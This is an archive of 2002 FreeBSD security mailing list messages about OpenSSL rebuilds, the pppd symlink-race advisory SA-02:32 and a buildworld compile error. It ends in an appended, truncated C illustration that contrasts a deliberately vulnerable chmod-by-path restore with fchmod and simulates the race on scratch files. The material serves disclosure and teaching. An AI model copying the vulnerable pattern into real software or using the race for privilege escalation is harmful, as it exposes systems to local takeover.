Received: from wsf.at (localhost [127.0.0.1]) by www.wsf.at (8.11.6/8.9.3) with SMTP id g6VBRWY98818; Wed, 31 Jul 2002 13:27:32 +0200 (CEST) (envelope-from net@wsf.at)
Message-Id: <200207311127.g6VBRWY98818@www.wsf.at>
Date: Wed, 31 Jul 2002 11:27:32 -0000
To: "Simon Dick" , "Adrian Penisoara"
Subject: Re: Are OpenSSL bugs related to OpenSSH ?
From:
X-Mailer: TWIG 2.6.2
In-Reply-To: <1028113366.1406.0.camel@linux>
Cc:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Simon Dick wrote:
> On Wed, 2002-07-31 at 10:24, Adrian Penisoara wrote:
> > Hi,
> >
> > Though I think that the recent OpenSSL buffer overflows don't imply
> > that OpenSSH is vulnerable, could someone please confirm this ?
>
> OpenSSH is linked against OpenSSL, so it's a possibility that it could
> be vulnerable, but unless you have ssh statically linked then updating
> your openssl version will fix any problems.
>

Hi Simon,

I think this is only true if your version of ssh/sshd was already built with a recent version of OpenSSL (libcrypto.so.3).
If your ssh uses libcrypto.so.2, updating OpenSSL to 0.9.6e would still leave your ssh vulnerable (same applies to any other build using OpenSSL).

Thomas

BTW: which version of OpenSSL bumped so.2 -> so.3 ?

From owner-freebsd-security Wed Jul 31 4:28:44 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9E33C37B400 for ; Wed, 31 Jul 2002 04:28:42 -0700 (PDT)
Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2897A43E70 for ; Wed, 31 Jul 2002 04:28:42 -0700 (PDT) (envelope-from nectar@nectar.cc)
Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id BA3553C; Wed, 31 Jul 2002 06:28:41 -0500 (CDT)
Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6VBSfU4026331; Wed, 31 Jul 2002 06:28:41 -0500 (CDT) (envelope-from nectar@madman.nectar.cc)
Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6VBSfeB026330; Wed, 31 Jul 2002 06:28:41 -0500 (CDT)
Date: Wed, 31 Jul 2002 06:28:41 -0500
From: "Jacques A. Vidrine"
To: "H. Wade Minter"
Cc: security@fre ebsd.org
Subject: Re: OpenSSL workaround
Message-ID: <20020731112841.GC26274@madman.nectar.cc>
References: <20020731032131.GB38906@madman.nectar.cc> <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org>
X-Url: http://www.nectar.cc/
User-Agent: Mutt/1.5.1i-ja.1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Wed, Jul 31, 2002 at 06:41:20AM -0400, H.
Wade Minter wrote:
> I knew I should have been clearer. :-) I cvsup'd to RELENG_4_6, but am
> curious about the steps to fix the problem after that. There's no
> standard Makefile in /usr/src/crypto/openssl/ - do I do the normal "make
> depend install" procedure on Makefile.org or Makefile.ssl instead?

Oh, sorry, I get you. I recommend that you rebuild the system as described in . Also rebuild third-party applications that use OpenSSL (either libssl or libcrypto). Any applications that are rebuilt must also be restarted.

Cheers,
--
Jacques A. Vidrine http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

From owner-freebsd-security Wed Jul 31 4:55:33 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BD1AB37B400 for ; Wed, 31 Jul 2002 04:55:30 -0700 (PDT)
Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id AE6A643E6A for ; Wed, 31 Jul 2002 04:55:29 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.12.5/8.12.3) with ESMTP id g6VBtQ1A015956; Wed, 31 Jul 2002 07:55:27 -0400 (EDT) (envelope-from mike@sentex.net)
Message-Id: <5.1.0.14.0.20020731075521.04b14d70@192.168.0.12>
X-Sender: mdtancsa@192.168.0.12
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 31 Jul 2002 07:57:30 -0400
To: Sune Stjerneby
From: Mike Tancsa
Subject: Re: apache mod_ssl ?
Cc: security@freebsd.org
In-Reply-To: <20020731085657.GA33775@fnyx.vmunix.dk>
References: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> <5.1.0.14.0.20020730231635.040ee248@192.168.0.12>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Virus-Scanned: amavis-20020220
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Thanks, looks like my local copy of libphp4.so as well :-(

Anyone know of any other apps statically compiled with bits of the vulnerable openssl out of the ports that would be affected ?

---Mike

At 10:56 AM 7/31/2002 +0200, Sune Stjerneby wrote:
>Mike Tancsa writes:
> >After a buildworld, do I need to worry about apache with mod_ssl ? Are
> >there parts that are statically compiled using openSSL ?
>
>I suspect so,
>
>% strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6"
>OpenSSL 0.9.6a 5 Apr 2001
>
>After a rebuild, it reads "OpenSSL 0.9.6e 30 Jul 2002" in
>apache/libssl.so.
>
>--
>Sune Stjerneby
> % bloto flem rech rech kini

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

From owner-freebsd-security Wed Jul 31 5: 3:27 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 00A5437B400; Wed, 31 Jul 2002 05:03:02 -0700 (PDT)
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5DF8443E6E; Wed, 31 Jul 2002 05:02:30 -0700 (PDT) (envelope-from security-advisories@freebsd.org)
Received: from freefall.freebsd.org (nectar@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VC2JJU023559; Wed, 31 Jul 2002 05:02:19 -0700 (PDT) (envelope-from security-advisories@freebsd.org)
Received: (from nectar@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VC2Jj4023557; Wed, 31 Jul 2002 05:02:19 -0700 (PDT)
Date: Wed, 31 Jul 2002 05:02:19 -0700 (PDT)
Message-Id: <200207311202.g6VC2Jj4023557@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-02:32.pppd
Reply-To: security-advisories@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-02:32.pppd                                       Security Advisory
                                                          The FreeBSD Project

Topic:          exploitable race
condition in pppd

Category:       core
Module:         pppd
Announced:      2002-07-31
Credits:        Sebastian Krahmer
Affects:        All releases of FreeBSD up to and including 4.6.1-RELEASE-p1
Corrected:      2002-07-30 03:50:40 UTC (RELENG_4)
                2002-07-30 19:15:52 UTC (RELENG_4_6)
                2002-07-30 19:16:46 UTC (RELENG_4_5)
                2002-07-30 19:17:27 UTC (RELENG_4_4)
FreeBSD only:   NO

I.   Background

FreeBSD ships with several implementations of the Point-to-Point Protocol (PPP). The pppd program is one of these implementations. It provides basic support for negotiating a link, while encapsulation is done by driver code in the kernel.

II.  Problem Description

A race condition exists in the pppd program that may be exploited in order to change the permissions of an arbitrary file. The file specified as the tty device is opened by pppd, and its permissions are recorded. If pppd then fails to initialize the tty device in some way (such as a failure of tcgetattr(3)), it attempts to restore the original permissions by calling chmod(2) on the path name. That call to chmod(2) is subject to a symlink race, so the permissions may be `restored' on some other file. Note that the pppd program is installed set-user-ID to root, so that any file's permissions may be changed in this fashion.

III. Impact

A malicious local user may exploit the race condition to acquire write permissions to a critical system file, such as /etc/crontab, and leverage the situation to acquire escalated privileges.

In FreeBSD 4.4-RELEASE and later, the local user must be in group `dialer' in order to run pppd and attempt to exploit this race.

IV.  Workaround

Remove the set-user-ID bit from pppd by executing the following command as root:

# chmod u-s /usr/sbin/pppd

V.   Solution

Do one of the following:

1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p2, 4.5-RELEASE-p11, or 4.4-RELEASE-p18).
2) To patch your present system:

The following patch has been verified to apply to FreeBSD 4.4, 4.5, and 4.6 systems.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:32/pppd.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:32/pppd.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/usr.sbin/pppd
# make depend && make && make install

VI.  Correction details

The following list contains the revision numbers of each file that was corrected in FreeBSD.

Path                      Branch       Revision
- -------------------------------------------------------------------------
usr.sbin/pppd/main.c      RELENG_4     1.19.2.1
                          RELENG_4_6   1.19.10.1
                          RELENG_4_5   1.19.8.1
                          RELENG_4_4   1.19.6.1
sys/conf/newvers.sh       RELENG_4_6   1.44.2.23.2.7
                          RELENG_4_5   1.44.2.20.2.12
                          RELENG_4_4   1.44.2.17.2.17
- -------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)

iQCVAwUBPUfQ4VUuHi5z0oilAQGaYwP/djtLXxRveB2xDy54hACNSArKnfAbEwEP
PisB8Er2Zl4CmwnKx3BO8zWoV+nb7afcWGoy2eU14b/sXTLpInpx+823J8nP3BUK
bsUInanuFxX6LfSTbzjRT+8wxxXKO4oarPFfxfVis09ekjO+FqTtm2pAV13ug/+s
Wrb8IG4YYVA=
=tfMD
-----END PGP SIGNATURE-----

From owner-freebsd-security Wed Jul 31 6:30:19 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4122137B400 for ; Wed, 31 Jul 2002 06:30:17 -0700 (PDT)
Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8E11A43E42 for ; Wed, 31 Jul 2002 06:30:15 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org)
Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by
net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6VDU65H028342 for ; Wed, 31 Jul 2002 15:30:08 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org)
X-MDaemon-Deliver-To:
Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6VDU4c7028320 for ; Wed, 31 Jul 2002 15:30:04 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org)
To: freebsd-security@FreeBSD.ORG
Message-ID:
From: dirk.meyer@dinoex.sub.org (Dirk Meyer)
Organization: privat
Subject: Re: Are OpenSSL bugs related to OpenSSH ?
Date: Wed, 31 Jul 2002 15:26:29 +0200
X-Mailer: Dinoex 1.79
References: <1028113366.1406.0.camel@linux> <200207311127.g6VBRWY98818@www.wsf.at>
X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94]
X-Accept-Language: de,en
X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12
X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail.
X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved.
X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster.
X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D
X-No-Archive: yes
X-ZC-VIA: 20020731000000S+2@dinoex.sub.org

> BTW: which version of OpenSSL bumped so.2 -> so.3 ?

http://www.FreeBSD.org/cgi/cvsweb.cgi/ports/security/openssl/Makefile?rev=1.58&content-type=text/x-cvsweb-markup

Otherwise configure scripts fail, detecting new headers and old libs. E.g. /lib/libssl.so.2 will be preferred over an existing and newer /usr/local/lib/libssl.so.2.

To keep ports working, I bumped the version back then.
kind regards Dirk

- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org]

From owner-freebsd-security Wed Jul 31 8:16:11 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7BAF237B400 for ; Wed, 31 Jul 2002 08:16:09 -0700 (PDT)
Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id F1D9743E65 for ; Wed, 31 Jul 2002 08:16:08 -0700 (PDT) (envelope-from nectar@nectar.cc)
Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 856D03C; Wed, 31 Jul 2002 10:16:08 -0500 (CDT)
Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6VFG8U4027015; Wed, 31 Jul 2002 10:16:08 -0500 (CDT) (envelope-from nectar@madman.nectar.cc)
Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6VFG8nx027014; Wed, 31 Jul 2002 10:16:08 -0500 (CDT)
Date: Wed, 31 Jul 2002 10:16:07 -0500
From: "Jacques A. Vidrine"
To: Dirk Meyer
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Are OpenSSL bugs related to OpenSSH ?
Message-ID: <20020731151607.GD26793@madman.nectar.cc>
Mail-Followup-To: "Jacques A.
Vidrine" , Dirk Meyer , freebsd-security@FreeBSD.ORG
References: <1028113366.1406.0.camel@linux> <200207311127.g6VBRWY98818@www.wsf.at>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To:
X-Url: http://www.nectar.cc/
User-Agent: Mutt/1.5.1i-ja.1

On Wed, Jul 31, 2002 at 03:26:29PM +0200, Dirk Meyer wrote:
>
> > BTW: which version of OpenSSL bumped so.2 -> so.3 ?
>
> http://www.FreeBSD.org/cgi/cvsweb.cgi/ports/security/openssl/Makefile?rev=1.58&content-type=text/x-cvsweb-markup
>
> otherwise configure scripts fails,
> detecting new headers and old libs. E.g. /lib/libssl.so.2 will
> be preferred over an existing and newer /usr/local/lib/libssl.so.2
>
> To keep ports working, I bumped the Version back then.

I think the configure script is broken, and having the port library version number artificially higher is not a great idea. :-(

Cheers,
-- 
Jacques A. Vidrine                      http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org .
nectar@kth.se

From owner-freebsd-security Wed Jul 31 8:37:36 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7A60837B400 for ; Wed, 31 Jul 2002 08:37:34 -0700 (PDT)
Received: from smtpout.mac.com (smtpout.mac.com [204.179.120.85]) by mx1.FreeBSD.org (Postfix) with ESMTP id 006EB43E4A for ; Wed, 31 Jul 2002 08:37:34 -0700 (PDT) (envelope-from wincentcolaiuta@mac.com)
Received: from smtp-relay04-en1.mac.com (smtp-relay04-en1 [10.13.10.223]) by smtpout.mac.com (8.12.1/8.10.2/1.0) with ESMTP id g6VFbX0a013514 for ; Wed, 31 Jul 2002 08:37:33 -0700 (PDT)
Received: from asmtp02.mac.com (asmtp02-qfe3.mac.com [10.13.10.66]) by smtp-relay04-en1.mac.com (8.12.1/8.12.1/1.0) with ESMTP id g6VFbX72000669 for ; Wed, 31 Jul 2002 08:37:33 -0700 (PDT)
Received: from cannondale.elcentro.red ([202.45.118.112]) by asmtp02.mac.com (Netscape Messaging Server 4.15) with ESMTP id H04E2H00.H49 for ; Wed, 31 Jul 2002 08:37:29 -0700
Date: Thu, 1 Aug 2002 01:07:20 +0930
Subject: Problem updating with RELENG_4_6 branch [stdio fix]
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v482)
From: Wincent Colaiuta
To: freebsd-security@FreeBSD.ORG
Content-Transfer-Encoding: 7bit
In-Reply-To:
Message-Id: <67229600-A49B-11D6-9DBA-003065C60B4C@mac.com>
X-Mailer: Apple Mail (2.482)

Just wondering if anyone has had any troubles updating their systems in light of the recent security notification (FreeBSD-SA-02:23.stdio [REVISED]).
I decided to update by rebuilding the world, and after a fresh cvsup of the RELENG_4_6 branch, I get the following error during the "make buildworld" in /usr/src/lib/libc:

> cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include
> -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE
> -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c
> /usr/src/lib/libc/../libc/xdr/xdr_array.c -o xdr_array.o
> /usr/src/lib/libc/../libc/xdr/xdr_array.c: In function `xdr_array':
> /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: `UINT_MAX' undeclared
> (first use in this function)
> /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: (Each undeclared
> identifier is reported only once
> /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: for each function it
> appears in.)
> *** Error code 1
>
> Stop in /usr/src/lib/libc.
> *** Error code 1
>
> Stop in /usr/src/lib.
> *** Error code 1
>
> Stop in /usr/src.
> *** Error code 1
>
> Stop in /usr/src.
> *** Error code 1
>
> Stop in /usr/src.

I re-did the cvsup just to be sure, and did a "make clean" in /usr/src just to be sure, but it failed again on the second attempt in the same way... Anyone else seen this or got any pointers? Or is this a question better posted to freebsd-questions? (apologies if this is the case).

The last make world I did was the update to 4.6.1-RELEASE #0 and that went fine...
Cheers
Wincent

From owner-freebsd-security Wed Jul 31 8:44:49 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D617837B400 for ; Wed, 31 Jul 2002 08:44:45 -0700 (PDT)
Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by mx1.FreeBSD.org (Postfix) with ESMTP id B295D43E3B for ; Wed, 31 Jul 2002 08:43:44 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au)
Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id BAA14594; Thu, 1 Aug 2002 01:42:33 +1000 (EST)
From: Darren Reed
Message-Id: <200207311542.BAA14594@caligula.anu.edu.au>
Subject: Re: Problem updating with RELENG_4_6 branch [stdio fix]
To: wincentcolaiuta@mac.com (Wincent Colaiuta)
Date: Thu, 1 Aug 2002 01:42:32 +1000 (Australia/ACT)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <67229600-A49B-11D6-9DBA-003065C60B4C@mac.com> from "Wincent Colaiuta" at Aug 01, 2002 01:07:20 AM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

In some mail from Wincent Colaiuta, sie said:
>
> Just wondering if anyone has had any troubles updating their systems in
> light of the recent security notification (FreeBSD-SA-02:23.stdio
> [REVISED]).
>
> I decided to update by rebuilding the world, and after a fresh cvsup of
> the RELENG_4_6 branch, I get the following error during the "make
> buildworld" in /usr/src/lib/libc:
>
> > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include
> > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE
> > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c -o xdr_array.o
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c: In function `xdr_array':
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: `UINT_MAX' undeclared
> > (first use in this function)
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: (Each undeclared
> > identifier is reported only once
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: for each function it
> > appears in.)

My mistake.  This has been fixed in CVS already.

From owner-freebsd-security Wed Jul 31 8:50:50 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C35DC37B406 for ; Wed, 31 Jul 2002 08:50:34 -0700 (PDT)
Received: from inord.no (oluf.et-n.no [213.161.160.12]) by mx1.FreeBSD.org (Postfix) with ESMTP id DD66D43E81 for ; Wed, 31 Jul 2002 08:50:20 -0700 (PDT) (envelope-from erik@pentadon.com)
Received: from erikpc [213.161.168.206] by inord.no (SMTPD32-7.06) id A62A908200F6; Wed, 31 Jul 2002 17:45:46 +0200
Message-ID: <007001c238aa$24b25d20$0200000a@erikpc>
From: Erik Paulsen Skålerud
To: "Wincent Colaiuta" ,
References: <67229600-A49B-11D6-9DBA-003065C60B4C@mac.com>
Subject: Re: Problem updating with RELENG_4_6 branch [stdio fix]
Date: Wed, 31 Jul 2002 17:51:32 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

paste from freebsd-stable@freebsd.org:

On Wed, Jul 31, 2002 at 03:45:51PM +0100, Nick Hilliard wrote:
> Today's xdr mfc to the security branches boobed up a little.  It looks
> like xdr_array.c needs to #include .

Yes, sorry.  I just fixed it in RELENG_4.  I will fix it shortly in the other RELENG_4_* branches, and in -CURRENT.

-- 
Jacques A. Vidrine                      http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

----- Original Message -----
From: "Wincent Colaiuta"
To:
Sent: Wednesday, July 31, 2002 5:37 PM
Subject: Problem updating with RELENG_4_6 branch [stdio fix]

> Just wondering if anyone has had any troubles updating their systems in
> light of the recent security notification (FreeBSD-SA-02:23.stdio
> [REVISED]).
>
> I decided to update by rebuilding the world, and after a fresh cvsup of
> the RELENG_4_6 branch, I get the following error during the "make
> buildworld" in /usr/src/lib/libc:
>
> > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include
> > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE
> > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c -o xdr_array.o
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c: In function `xdr_array':
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: `UINT_MAX' undeclared
> > (first use in this function)
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: (Each undeclared
> > identifier is reported only once
> > /usr/src/lib/libc/../libc/xdr/xdr_array.c:80: for each function it
> > appears in.)
> > *** Error code 1
> >
> > Stop in /usr/src/lib/libc.
> > *** Error code 1
> >
> > Stop in /usr/src/lib.
> > *** Error code 1
> >
> > Stop in /usr/src.
> > *** Error code 1
> >
> > Stop in /usr/src.
> > *** Error code 1
> >
> > Stop in /usr/src.
>
> I re-did the cvsup just to be sure, and did a "make clean" in /usr/src
> just to be sure, but it failed again on the second attempt in the same
> way... Anyone else seen this or got any pointers? Or is this a question
> better posted to freebsd-questions? (apologies if this is the case).
>
> The last make world I did was the update to 4.6.1-RELEASE #0 and that
> went fine...
>
> Cheers
> Wincent

From owner-freebsd-security Wed Jul 31 9: 5:55 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D5F9D37B406 for ; Wed, 31 Jul 2002 09:05:36 -0700 (PDT)
Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 468D943E6A for ; Wed, 31 Jul 2002 09:05:36 -0700 (PDT) (envelope-from schulte+freebsd@nospam.schulte.org)
Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id DCDA9243C0; Wed, 31 Jul 2002 10:47:18 -0500 (CDT)
Received: from schulte-laptop.nospam.schulte.org (carpnod.schulte.org [209.134.156.200]) by clink.schulte.org (Postfix) with ESMTP id D749C243BE; Wed, 31 Jul 2002 10:47:16 -0500 (CDT)
Message-Id: <5.1.1.6.2.20020731104559.060d3900@localhost>
X-Sender: (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Wed, 31 Jul 2002 10:46:49 -0500
To: Wincent Colaiuta , freebsd-security@FreeBSD.ORG
From: Christopher Schulte
Subject: Re: Problem updating with RELENG_4_6 branch [stdio fix]
In-Reply-To: <67229600-A49B-11D6-9DBA-003065C60B4C@mac.com>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
format=flowed
X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org

At 01:07 AM 8/1/2002 +0930, Wincent Colaiuta wrote:
>Just wondering if anyone has had any troubles updating their systems in
>light of the recent security notification (FreeBSD-SA-02:23.stdio [REVISED]).
>
>I decided to update by rebuilding the world, and after a fresh cvsup of
>the RELENG_4_6 branch, I get the following error during the "make
>buildworld" in /usr/src/lib/libc:
>
>>cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include
>>-D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE
>>-I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c
>>/usr/src/lib/libc/../libc/xdr/xdr_array.c -o xdr_array.o
>>/usr/src/lib/libc/../libc/xdr/xdr_array.c: In function `xdr_array':
>>/usr/src/lib/libc/../libc/xdr/xdr_array.c:80: `UINT_MAX' undeclared
>>(first use in this function)
>>/usr/src/lib/libc/../libc/xdr/xdr_array.c:80: (Each undeclared identifier
>>is reported only once
>>/usr/src/lib/libc/../libc/xdr/xdr_array.c:80: for each function it
>>appears in.)

Discussed in -stable, a fix should already be in the tree.

-- 
Christopher Schulte
http://www.schulte.org/
Do not un-munge my @nospam.schulte.org email address.
This address is valid.
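Stepping back to the pppd advisory (FreeBSD-SA-02:32) that opens this digest: the bug is a time-of-check/time-of-use race on a path name, and the standard fix pattern is to act on the descriptor already held instead of re-resolving the name. The C program below is an added illustration written for this page; it is not pppd's code and not the FreeBSD patch. The harness function race_demo, the scratch directory under /tmp and the "victim" and "decoy" files are all constructed for the demonstration. It opens a symlink as the "tty", records the mode, repoints the symlink at the victim the way the attacker would, and then restores the mode once with chmod(2) on the path and once with fchmod(2) on the open descriptor.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: "restore" permissions by path name.  chmod(2)
 * re-resolves the name, so if a symlink at that name has meanwhile been
 * repointed, the mode lands on whatever file it points at now. */
int restore_mode_by_path(const char *path, mode_t mode)
{
    return chmod(path, mode);
}

/* Hardened pattern: operate on the descriptor we already hold.  The
 * descriptor is bound to the inode that was opened, not to the name. */
int restore_mode_by_fd(int fd, mode_t mode)
{
    return fchmod(fd, mode);
}

/* Constructed harness (not pppd code).  Sets up a scratch directory with a
 * "victim" file (mode 0644, standing in for /etc/crontab) and a decoy
 * (mode 0666), then replays the sequence from the advisory: open the tty
 * path, record its mode, lose the race, restore.  Returns the victim's
 * final permission bits, or (mode_t)-1 if setup failed. */
mode_t race_demo(int use_fd)
{
    char dir[64];
    strcpy(dir, "/tmp/pppdrace.XXXXXX");
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "./pppdrace.XXXXXX");   /* fallback if /tmp is unwritable */
        if (mkdtemp(dir) == NULL)
            return (mode_t)-1;
    }
    char victim[128], decoy[128], tty[128];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(decoy, sizeof decoy, "%s/decoy", dir);
    snprintf(tty, sizeof tty, "%s/tty", dir);

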